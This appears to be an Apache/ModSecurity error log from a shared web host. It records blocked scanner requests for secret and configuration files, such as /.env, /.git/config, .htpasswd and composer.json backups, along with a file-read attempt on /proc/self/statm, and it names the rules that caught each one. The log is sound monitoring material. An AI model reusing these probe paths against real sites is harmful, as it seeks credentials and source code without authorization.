[Mon May 11 12:42:46.649895 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:24504] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /views/composer.json-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/views/composer.json-hotfix"] [unique_id "agGypkRdw2n9wv6Ai48Z9AAAAJU"]
[Mon May 11 12:42:46.650118 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:24504] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/views/composer.json-hotfix"] [unique_id "agGypkRdw2n9wv6Ai48Z9AAAAJU"]
[Mon May 11 12:42:47.901093 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:24504] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGypkRdw2n9wv6Ai48Z9AAAAJU"]
[Mon May 11 12:42:47.928255 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:24506] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /views/composer.json-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/views/composer.json-hotfix"] [unique_id "agGyp0YQeUtAPynIs6xqvgAAAAc"]
[Mon May 11 12:42:47.928465 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:24506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/views/composer.json-hotfix"] [unique_id "agGyp0YQeUtAPynIs6xqvgAAAAc"]
[Mon May 11 12:42:49.144738 2026] [security2:error] [pid 1254212:tid 1254221] [client 185.177.72.9:24506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyp0YQeUtAPynIs6xqvgAAAAc"]
[Mon May 11 12:42:57.683267 2026] [authz_core:error] [pid 1254242:tid 1254258] [client 47.128.23.3:53370] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/theme-compat/error_log
[Mon May 11 12:43:05.110832 2026] [autoindex:error] [pid 1254179:tid 1254195] [client 205.210.31.13:62786] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 12:43:12.644139 2026] [security2:error] [pid 1254242:tid 1254256] [client 216.73.216.110:13559] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/stat found within ARGS:filesrc: /proc/self/statm"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGywL4KNmD_mZ_vlf9M3wAAAEs"]
[Mon May 11 12:43:12.645055 2026] [security2:error] [pid 1254242:tid 1254256] [client 216.73.216.110:13559] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGywL4KNmD_mZ_vlf9M3wAAAEs"]
[Mon May 11 12:43:12.733192 2026] [security2:error] [pid 1254242:tid 1254256] [client 216.73.216.110:13559] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGywL4KNmD_mZ_vlf9M3wAAAEs"]
[Mon May 11 12:43:15.885131 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:16410] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/composer.json~"] [unique_id "agGyw5kIEwRJMyDaV55gCgAAAVg"]
[Mon May 11 12:43:15.885509 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:16410] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/composer.json~"] [unique_id "agGyw5kIEwRJMyDaV55gCgAAAVg"]
[Mon May 11 12:43:17.114314 2026] [security2:error] [pid 1256241:tid 1256270] [client 185.177.72.9:16410] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyw5kIEwRJMyDaV55gCgAAAVg"]
[Mon May 11 12:43:17.117305 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:16414] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/composer.json~"] [unique_id "agGyxZkIEwRJMyDaV55gDwAAAUk"]
[Mon May 11 12:43:17.117518 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:16414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/composer.json~"] [unique_id "agGyxZkIEwRJMyDaV55gDwAAAUk"]
[Mon May 11 12:43:18.407359 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:16414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyxZkIEwRJMyDaV55gDwAAAUk"]
[Mon May 11 12:43:18.432902 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:16420] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /dev/.htpasswd~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/dev/.htpasswd~"] [unique_id "agGyxhjZymfuKpjWXeiPTwAAAMs"]
[Mon May 11 12:43:18.433116 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:16420] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/dev/.htpasswd~"] [unique_id "agGyxhjZymfuKpjWXeiPTwAAAMs"]
[Mon May 11 12:43:19.605977 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:16420] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyxhjZymfuKpjWXeiPTwAAAMs"]
[Mon May 11 12:43:19.631282 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:16430] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /dev/.htpasswd~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/dev/.htpasswd~"] [unique_id "agGyx2S6k_SCYd1AVZrCZAAAAQ8"]
[Mon May 11 12:43:19.631490 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:16430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/dev/.htpasswd~"] [unique_id "agGyx2S6k_SCYd1AVZrCZAAAAQ8"]
[Mon May 11 12:43:20.838641 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:16430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGyx2S6k_SCYd1AVZrCZAAAAQ8"]
[Mon May 11 12:43:35.437390 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:32098] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /play/composer.json~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/play/composer.json~"] [unique_id "agGy10YQeUtAPynIs6xrAgAAAA4"]
[Mon May 11 12:43:35.437604 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:32098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/play/composer.json~"] [unique_id "agGy10YQeUtAPynIs6xrAgAAAA4"]
[Mon May 11 12:43:36.624570 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:32098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy10YQeUtAPynIs6xrAgAAAA4"]
[Mon May 11 12:43:36.650949 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:32104] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /play/composer.json~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/play/composer.json~"] [unique_id "agGy2L4KNmD_mZ_vlf9NAAAAAEU"]
[Mon May 11 12:43:36.651673 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:32104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/play/composer.json~"] [unique_id "agGy2L4KNmD_mZ_vlf9NAAAAAEU"]
[Mon May 11 12:43:37.900660 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:32104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy2L4KNmD_mZ_vlf9NAAAAAEU"]
[Mon May 11 12:43:52.804384 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:2740] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agGy6EYQeUtAPynIs6xrGQAAAAE"]
[Mon May 11 12:43:52.807858 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:2740] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agGy6EYQeUtAPynIs6xrGQAAAAE"]
[Mon May 11 12:43:54.001270 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:2740] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy6EYQeUtAPynIs6xrGQAAAAE"]
[Mon May 11 12:43:54.026346 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:16232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env"] [unique_id "agGy6mS6k_SCYd1AVZrCiwAAAQM"]
[Mon May 11 12:43:54.026646 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:16232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env"] [unique_id "agGy6mS6k_SCYd1AVZrCiwAAAQM"]
[Mon May 11 12:43:55.319206 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:16232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy6mS6k_SCYd1AVZrCiwAAAQM"]
[Mon May 11 12:44:00.530047 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:16262] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGy8L4KNmD_mZ_vlf9NHQAAAEE"]
[Mon May 11 12:44:00.556121 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:16262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGy8L4KNmD_mZ_vlf9NHQAAAEE"]
[Mon May 11 12:44:01.912652 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:16262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGy8L4KNmD_mZ_vlf9NHQAAAEE"]
[Mon May 11 12:44:01.932341 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:16268] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGy8ZkIEwRJMyDaV55gUgAAAUk"]
[Mon May 11 12:44:01.967526 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:16268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config"] [unique_id "agGy8ZkIEwRJMyDaV55gUgAAAUk"]
